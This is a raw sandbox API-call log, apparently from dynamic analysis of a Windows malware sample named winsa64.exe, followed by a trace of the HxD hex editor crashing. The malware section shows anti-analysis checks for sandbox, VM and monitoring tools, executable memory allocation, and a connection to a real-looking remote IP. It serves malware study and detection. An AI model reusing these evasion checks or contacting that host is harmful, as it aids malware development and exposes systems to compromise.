OpenProcess(SbieCtrl.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
OpenProcess(iexplore.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
OpenProcess(firefox.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
OpenProcess(VBoxTray.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
OpenProcess(procexp.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
OpenProcess(BSA.EXE) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
LoadLibrary(kernel32.dll) [c:\windows\winsa64.exe]
LoadLibrary(user32.dll) [c:\windows\winsa64.exe]
LoadLibrary(advapi32.dll) [c:\windows\winsa64.exe]
LoadLibrary(oleaut32.dll) [c:\windows\winsa64.exe]
LoadLibrary(msvcrt.dll) [c:\windows\winsa64.exe]
LoadLibrary(ole32.dll) [c:\windows\winsa64.exe]
LoadLibrary(version.dll) [c:\windows\winsa64.exe]
LoadLibrary(gdi32.dll) [c:\windows\winsa64.exe]
LoadLibrary(wininet.dll) [c:\windows\winsa64.exe]
LoadLibrary(shlwapi.dll) [c:\windows\winsa64.exe]
LoadLibrary(normaliz.dll) [c:\windows\winsa64.exe]
LoadLibrary(urlmon.dll) [c:\windows\winsa64.exe]
LoadLibrary(iertutil.dll) [c:\windows\winsa64.exe]
LoadLibrary(comctl32.dll) [c:\windows\winsa64.exe]
GetModuleHandle(lz32.dll) [c:\windows\winsa64.exe]
LoadLibrary(lz32.dll) [c:\windows\winsa64.exe]
VirtualAllocEx(c:\sandbox\r32\defaultbox\drive\c\windows\winsa64.exe,MEM_RESERVE,PAGE_READWRITE) [c:\windows\winsa64.exe]
VirtualAllocEx(c:\sandbox\r32\defaultbox\drive\c\windows\winsa64.exe,MEM_COMMIT,PAGE_READWRITE) [c:\windows\winsa64.exe]
GetModuleHandle(kernel32.dll) [c:\windows\winsa64.exe]
VirtualQueryEx(c:\sandbox\r32\defaultbox\drive\c\windows\winsa64.exe) [c:\windows\winsa64.exe]
OpenProcess(XueTr.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
GetModuleHandle(Kernel32) [c:\windows\winsa64.exe]
OpenProcess(dumpcap.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
SystemParametersInfo(SPI_GETWHEELSCROLLLINES,0) [c:\windows\winsa64.exe]
SystemParametersInfo(SPI_GETDRAGFULLWINDOWS,4) [c:\windows\winsa64.exe]
SystemParametersInfo(SPI_GETHIGHCONTRAST,12) [c:\windows\winsa64.exe]
OpenProcessToken(C:\WINDOWS\winsa64.exe) [c:\windows\winsa64.exe]
SystemParametersInfo(SPI_GETNONCLIENTMETRICS,500) [c:\windows\winsa64.exe]
SystemParametersInfo(SPI_GETMENUDROPALIGNMENT,0) [c:\windows\winsa64.exe]
SystemParametersInfo(SPI_GETMOUSEHOVERTIME,0) [c:\windows\winsa64.exe]
SystemParametersInfo(SPI_GETFLATMENU,0) [c:\windows\winsa64.exe]
ResumeThread() [c:\windows\winsa64.exe]
GetModuleHandle(Advapi32.dll) [c:\windows\winsa64.exe]
GetModuleHandle(LPK.DLL) [c:\windows\winsa64.exe]
OpenProcess(winsa64.exe) [c:\windows\winsa64.exe]
GetModuleHandle(USER32) [c:\windows\winsa64.exe]
LoadLibrary(imm32.dll) [c:\windows\winsa64.exe]
FreeLibrary(C:\WINDOWS\system32\lz32.dll) [c:\windows\winsa64.exe]
VirtualAllocEx(c:\sandbox\r32\defaultbox\drive\c\windows\winsa64.exe,MEM_RESERVE,PAGE_NOACCESS) [c:\windows\winsa64.exe]
GetModuleHandle(oleaut32.dll) [c:\windows\winsa64.exe]
GetModuleHandle(USER32.DLL) [c:\windows\winsa64.exe]
GetModuleHandle(comctl32.dll) [c:\windows\winsa64.exe]
LoadLibrary(c:\windows\system32\uxtheme.dll) [c:\windows\winsa64.exe]
IsDebuggerPresent() [c:\windows\winsa64.exe]
FreeLibrary(C:\WINDOWS\system32\uxtheme.dll) [c:\windows\winsa64.exe]
BitBlt() [c:\windows\winsa64.exe]
SystemParametersInfo(SPI_GETICONTITLELOGFONT,60) [c:\windows\winsa64.exe]
SystemParametersInfo(SPI_GETNONCLIENTMETRICS,0) [c:\windows\winsa64.exe]
VirtualAllocEx(c:\sandbox\r32\defaultbox\drive\c\windows\winsa64.exe,MEM_COMMIT,PAGE_EXECUTE_READWRITE) [c:\windows\winsa64.exe]
LoadLibrary(c:\windows\system32\msctf.dll) [c:\windows\winsa64.exe]
GetModuleHandle(C:\WINDOWS\system32\ntdll.dll) [c:\windows\winsa64.exe]
GetModuleHandle(C:\WINDOWS\system32\imm32.dll) [c:\windows\winsa64.exe]
CreateMutex(CTF.LBES.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\windows\winsa64.exe]
CreateMutex(CTF.Compart.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\windows\winsa64.exe]
CreateMutex(CTF.Asm.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\windows\winsa64.exe]
CreateMutex(CTF.Layouts.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\windows\winsa64.exe]
CreateMutex(CTF.TMD.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\windows\winsa64.exe]
GetModuleHandle(C:\WINDOWS\system32\KERNEL32) [c:\windows\winsa64.exe]
CreateMutex(CTF.TimListCache.FMPDefaultS-1-5-21-1482476501-1202660629-1957994488-1003MUTEX.DefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\windows\winsa64.exe]
GetModuleHandle(version.dll) [c:\windows\winsa64.exe]
FreeLibrary() [c:\windows\winsa64.exe]
OpenMutex(ShimCacheMutex) [c:\windows\winsa64.exe]
LoadLibrary(c:\windows\system32\msctfime.ime) [c:\windows\winsa64.exe]
GetModuleHandle(dbghelp.dll) [c:\windows\winsa64.exe]
GetModuleHandle(SbieDll.dll) [c:\windows\winsa64.exe]
LoadLibrary(wsock32.dll) [c:\windows\winsa64.exe]
LoadLibrary(ws2_32.dll) [c:\windows\winsa64.exe]
LoadLibrary(ws2help.dll) [c:\windows\winsa64.exe]
LoadLibrary(shell32.dll) [c:\windows\winsa64.exe]
VirtualAllocEx(c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe,MEM_COMMIT,PAGE_READWRITE) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
FreeLibrary(C:\WINDOWS\system32\IMM32.DLL) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
CreateMutex(INSONIA) [c:\windows\winsa64.exe]
CreateFile(C:\WINDOWS\winsa64.cfg) [c:\windows\winsa64.exe]
Sleep(100) [c:\windows\winsa64.exe]
LoadLibrary(c:\windows\system32\mswsock.dll) [c:\windows\winsa64.exe]
LoadLibrary(hnetcfg.dll) [c:\windows\winsa64.exe]
LoadLibrary(rpcrt4.dll) [c:\windows\winsa64.exe]
LoadLibrary(c:\windows\system32\wshtcpip.dll) [c:\windows\winsa64.exe]
LoadLibrary(dnsapi.dll) [c:\windows\winsa64.exe]
LoadLibrary(iphlpapi.dll) [c:\windows\winsa64.exe]
LoadLibrary(c:\windows\system32\winrnr.dll) [c:\windows\winsa64.exe]
LoadLibrary(wldap32.dll) [c:\windows\winsa64.exe]
LoadLibrary(rasadhlp.dll) [c:\windows\winsa64.exe]
GetModuleHandle(ws2_32.dll) [c:\windows\winsa64.exe]
connect( 212.1.208.24:80 ) [c:\windows\winsa64.exe]
DeleteFile(C:\WINDOWS\a.exe) [c:\windows\winsa64.exe]
Sleep(60000000) [c:\windows\winsa64.exe]
Executing: c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe
LoadLibrary(kernel32.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(user32.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(advapi32.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(oleaut32.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(msvcrt.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(ole32.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(version.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(gdi32.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(comctl32.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(shlwapi.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(shell32.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(wininet.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(normaliz.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(urlmon.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(iertutil.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(imm32.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(winspool.drv) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(comdlg32.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(winmm.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
GetModuleHandle(lz32.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(lz32.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
GetModuleHandle(kernel32.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
VirtualQueryEx(c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
GetModuleHandle(Kernel32) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
SystemParametersInfo(SPI_GETWHEELSCROLLLINES,0) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
SystemParametersInfo(SPI_GETDRAGFULLWINDOWS,4) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
SystemParametersInfo(SPI_GETHIGHCONTRAST,12) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
OpenProcessToken(C:\Documents and Settings\r32\Mis documentos\Tools\HxD\HxD.exe) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
SystemParametersInfo(SPI_GETNONCLIENTMETRICS,500) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
SystemParametersInfo(SPI_GETMENUDROPALIGNMENT,0) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
SystemParametersInfo(SPI_GETMOUSEHOVERTIME,0) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
SystemParametersInfo(SPI_GETFLATMENU,0) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
GetModuleHandle(LPK.DLL) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
ResumeThread() [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
GetModuleHandle(Advapi32.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
CreateEvent(DINPUTWINMM) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
FreeLibrary(C:\WINDOWS\system32\lz32.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
FindWindow(STATIC,000003C4_PID_FastMM) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(c:\windows\system32\uxtheme.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
IsDebuggerPresent() [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
FreeLibrary(C:\WINDOWS\system32\uxtheme.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(c:\windows\system32\msctf.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
GetModuleHandle(C:\WINDOWS\system32\ntdll.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
GetModuleHandle(C:\WINDOWS\system32\imm32.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
CreateMutex(CTF.LBES.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
CreateMutex(CTF.Compart.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
CreateMutex(CTF.Asm.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
CreateMutex(CTF.Layouts.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
CreateMutex(CTF.TMD.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
GetModuleHandle(C:\WINDOWS\system32\KERNEL32) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
CreateMutex(CTF.TimListCache.FMPDefaultS-1-5-21-1482476501-1202660629-1957994488-1003MUTEX.DefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
GetModuleHandle(version.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
FreeLibrary() [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
OpenMutex(ShimCacheMutex) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(c:\windows\system32\msctfime.ime) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
GetModuleHandle(oleaut32.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
GetModuleHandle(USER32.DLL) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
BitBlt() [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
SystemParametersInfo(SPI_GETICONTITLELOGFONT,60) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
SystemParametersInfo(SPI_GETNONCLIENTMETRICS,0) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
GetModuleHandle(C:\Documents and Settings\r32\Mis documentos\Tools\HxD\HxD.exe) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
GetModuleHandle(USER32) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
GetModuleHandle(ole32.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(psapi.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
GetModuleHandle(comctl32.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(msimg32.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
SystemParametersInfo(SPI_GETMENUANIMATION,0) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
FindWindow(TXmInstanceManager,HxD{73025671-91B6-473C-B0EE-6EAB6FD0E6DE}) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
CreateMutex(HxD{73025671-91B6-473C-B0EE-6EAB6FD0E6DE}) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
SystemParametersInfo(SPI_GETWORKAREA,0) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
GetWindowTextLength() [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
FreeLibrary(C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
FreeLibrary(C:\Documents and Settings\r32\Mis documentos\Tools\HxD\HxD.exe) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
SystemParametersInfo(SPI_GETKEYBOARDCUES,0) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
GetForegroundWindow() [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
GetModuleHandle(C:\WINDOWS\system32\Msimtf.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
SetTimer(1098a) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
FindWindow(Shell_TrayWnd,(null)) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
OpenProcess(explorer.exe) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(xpsp2res.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(xpsp3res.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
SystemParametersInfo(SPI_GETFONTSMOOTHINGTYPE,0) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
SetTimer(0) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
CreateMutex(MSCTF.Shared.MUTEX.EBH) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
GetKeyState() [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
OpenSCManager((null),(null)) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
OpenService(AudioSrv) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(rpcrt4.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(wdmaud.drv) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(setupapi.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
GetComputerName() [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
AdjustTokenPrivileges(SE_PRIVILEGE_ENABLED) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(wintrust.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(crypt32.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(msasn1.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(imagehlp.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
FreeLibrary(C:\WINDOWS\system32\ADVAPI32.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
CreateEvent(Global\crypt32LogoffEvent) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
FreeLibrary(C:\WINDOWS\system32\setupapi.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
FreeLibrary(C:\WINDOWS\system32\wdmaud.drv) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(msacm32.drv) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(msacm32.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
FreeLibrary(C:\WINDOWS\system32\msacm32.drv) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(midimap.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
CreateMutex(MidiMapper_modLongMessage_RefCnt) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
CreateMutex(MidiMapper_Configure) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
FreeLibrary(C:\WINDOWS\system32\midimap.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
GetModuleHandle(C:\WINDOWS\system32\Msctf.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(c:\windows\system32\faultrep.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
CreateEvent(Global\userenv:  User Profile setup event) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(userenv.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(winsta.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(netapi32.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(wtsapi32.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
FreeLibrary(C:\WINDOWS\system32\kernel32.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
CreateFile(C:\DOCUME~1\r32\CONFIG~1\Temp\74b4_appcompat.txt) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
CreateToolhelp32Snapshot(TH32C2_SNAPMODULE,964) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(c:\windows\system32\apphelp.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
FreeLibrary(C:\WINDOWS\system32\apphelp.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
CreateProcess((null),C:\WINDOWS\system32\dwwin.exe -x -s 456,C:\WINDOWS\system32) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
GetModuleHandle(winlogon.EXE) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
GetModuleHandle(advapi32) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
VirtualAllocEx(c:\windows\system32\dwwin.exe,MEM_COMMIT,PAGE_READWRITE) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
OpenProcess(dwwin.exe) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
WriteProcessMemory(c:\windows\system32\dwwin.exe) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
VirtualAllocEx(c:\windows\system32\dwwin.exe,MEM_RESERVE,PAGE_READWRITE) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
Executing: c:\windows\system32\dwwin.exe
LoadLibrary(advapi32.dll) [c:\windows\system32\dwwin.exe]
LoadLibrary(comctl32.dll) [c:\windows\system32\dwwin.exe]
LoadLibrary(gdi32.dll) [c:\windows\system32\dwwin.exe]
LoadLibrary(kernel32.dll) [c:\windows\system32\dwwin.exe]
LoadLibrary(oleaut32.dll) [c:\windows\system32\dwwin.exe]
LoadLibrary(msvcrt.dll) [c:\windows\system32\dwwin.exe]
LoadLibrary(ole32.dll) [c:\windows\system32\dwwin.exe]
LoadLibrary(shell32.dll) [c:\windows\system32\dwwin.exe]
LoadLibrary(shlwapi.dll) [c:\windows\system32\dwwin.exe]
LoadLibrary(urlmon.dll) [c:\windows\system32\dwwin.exe]
LoadLibrary(iertutil.dll) [c:\windows\system32\dwwin.exe]
LoadLibrary(user32.dll) [c:\windows\system32\dwwin.exe]
LoadLibrary(version.dll) [c:\windows\system32\dwwin.exe]
LoadLibrary(wininet.dll) [c:\windows\system32\dwwin.exe]
LoadLibrary(normaliz.dll) [c:\windows\system32\dwwin.exe]
LoadLibrary(shimeng.dll) [c:\windows\system32\dwwin.exe]
LoadLibrary(c:\windows\apppatch\acgenral.dll) [c:\windows\system32\dwwin.exe]
GetModuleHandle(kernel32.dll) [c:\windows\system32\dwwin.exe]
VirtualQueryEx(c:\windows\system32\dwwin.exe) [c:\windows\system32\dwwin.exe]
CreateMutex(SHIMLIB_LOG_MUTEX) [c:\windows\system32\dwwin.exe]
LoadLibrary(winmm.dll) [c:\windows\system32\dwwin.exe]
LoadLibrary(msacm32.dll) [c:\windows\system32\dwwin.exe]
LoadLibrary(userenv.dll) [c:\windows\system32\dwwin.exe]
LoadLibrary(uxtheme.dll) [c:\windows\system32\dwwin.exe]
GetModuleHandle(lz32.dll) [c:\windows\system32\dwwin.exe]
LoadLibrary(lz32.dll) [c:\windows\system32\dwwin.exe]
GetModuleHandle(Kernel32) [c:\windows\system32\dwwin.exe]
GetModuleHandle(LPK.DLL) [c:\windows\system32\dwwin.exe]
OpenProcess(dwwin.exe) [c:\windows\system32\dwwin.exe]
SystemParametersInfo(SPI_GETWHEELSCROLLLINES,0) [c:\windows\system32\dwwin.exe]
GetModuleHandle(USER32) [c:\windows\system32\dwwin.exe]
SystemParametersInfo(SPI_GETDRAGFULLWINDOWS,4) [c:\windows\system32\dwwin.exe]
OpenProcessToken(C:\WINDOWS\system32\dwwin.exe) [c:\windows\system32\dwwin.exe]
SystemParametersInfo(SPI_GETNONCLIENTMETRICS,500) [c:\windows\system32\dwwin.exe]
SystemParametersInfo(SPI_GETMOUSEHOVERTIME,0) [c:\windows\system32\dwwin.exe]
LoadLibrary(imm32.dll) [c:\windows\system32\dwwin.exe]
SystemParametersInfo(SPI_GETHIGHCONTRAST,12) [c:\windows\system32\dwwin.exe]
SystemParametersInfo(SPI_GETMENUDROPALIGNMENT,0) [c:\windows\system32\dwwin.exe]
SystemParametersInfo(SPI_GETFLATMENU,0) [c:\windows\system32\dwwin.exe]
ResumeThread() [c:\windows\system32\dwwin.exe]
GetModuleHandle(Advapi32.dll) [c:\windows\system32\dwwin.exe]
CreateEvent(DINPUTWINMM) [c:\windows\system32\dwwin.exe]
CreateEvent(Global\userenv:  User Profile setup event) [c:\windows\system32\dwwin.exe]
FreeLibrary(C:\WINDOWS\system32\lz32.dll) [c:\windows\system32\dwwin.exe]
SystemParametersInfo(SPI_GETWORKAREA,0) [c:\windows\system32\dwwin.exe]
IsDebuggerPresent() [c:\windows\system32\dwwin.exe]
FreeLibrary(C:\WINDOWS\system32\UxTheme.dll) [c:\windows\system32\dwwin.exe]
LoadLibrary(riched20.dll) [c:\windows\system32\dwwin.exe]
LoadLibrary(shfolder.dll) [c:\windows\system32\dwwin.exe]
FreeLibrary(C:\WINDOWS\system32\SHELL32.DLL) [c:\windows\system32\dwwin.exe]
FreeLibrary(C:\WINDOWS\system32\shfolder.dll) [c:\windows\system32\dwwin.exe]
BitBlt() [c:\windows\system32\dwwin.exe]
LoadLibrary(c:\windows\system32\msctf.dll) [c:\windows\system32\dwwin.exe]
GetModuleHandle(C:\WINDOWS\system32\ntdll.dll) [c:\windows\system32\dwwin.exe]
GetModuleHandle(C:\WINDOWS\system32\imm32.dll) [c:\windows\system32\dwwin.exe]
CreateMutex(CTF.LBES.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\windows\system32\dwwin.exe]
CreateMutex(CTF.Compart.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\windows\system32\dwwin.exe]
CreateMutex(CTF.Asm.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\windows\system32\dwwin.exe]
CreateMutex(CTF.Layouts.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\windows\system32\dwwin.exe]
CreateMutex(CTF.TMD.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\windows\system32\dwwin.exe]
GetModuleHandle(C:\WINDOWS\system32\KERNEL32) [c:\windows\system32\dwwin.exe]
CreateMutex(CTF.TimListCache.FMPDefaultS-1-5-21-1482476501-1202660629-1957994488-1003MUTEX.DefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\windows\system32\dwwin.exe]
SetTimer(20996) [c:\windows\system32\dwwin.exe]
FreeLibrary() [c:\windows\system32\dwwin.exe]
CreateFile(C:\DOCUME~1\r32\CONFIG~1\Temp\597A56.dmp) [c:\windows\system32\dwwin.exe]
GetModuleHandle(NTDLL.DLL) [c:\windows\system32\dwwin.exe]
LoadLibrary(psapi.dll) [c:\windows\system32\dwwin.exe]
OpenProcess(HxD.exe) [c:\windows\system32\dwwin.exe]
ReadProcessMemory(c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe) [c:\windows\system32\dwwin.exe]
CreateToolhelp32Snapshot(TH32C2_SNAPTHREAD,964) [c:\windows\system32\dwwin.exe]
QuerySystemInformation() [c:\windows\system32\dwwin.exe]
SuspendThread(1808) [c:\windows\system32\dwwin.exe]
SuspendThread(1800) [c:\windows\system32\dwwin.exe]
SuspendThread(1796) [c:\windows\system32\dwwin.exe]
SuspendThread(1792) [c:\windows\system32\dwwin.exe]
CreateToolhelp32Snapshot(TH32C2_SNAPALL,964) [c:\windows\system32\dwwin.exe]
LoadLibrary(c:\windows\system32\ntdll.dll) [c:\windows\system32\dwwin.exe]
FreeLibrary(C:\WINDOWS\system32\ntdll.dll) [c:\windows\system32\dwwin.exe]
FreeLibrary(C:\WINDOWS\system32\kernel32.dll) [c:\windows\system32\dwwin.exe]
FreeLibrary(C:\WINDOWS\system32\USER32.dll) [c:\windows\system32\dwwin.exe]
FreeLibrary(C:\WINDOWS\system32\GDI32.dll) [c:\windows\system32\dwwin.exe]
FreeLibrary(C:\WINDOWS\system32\IMM32.DLL) [c:\windows\system32\dwwin.exe]
FreeLibrary(C:\WINDOWS\system32\ADVAPI32.dll) [c:\windows\system32\dwwin.exe]
LoadLibrary(c:\windows\system32\rpcrt4.dll) [c:\windows\system32\dwwin.exe]
FreeLibrary(C:\WINDOWS\system32\RPCRT4.dll) [c:\windows\system32\dwwin.exe]
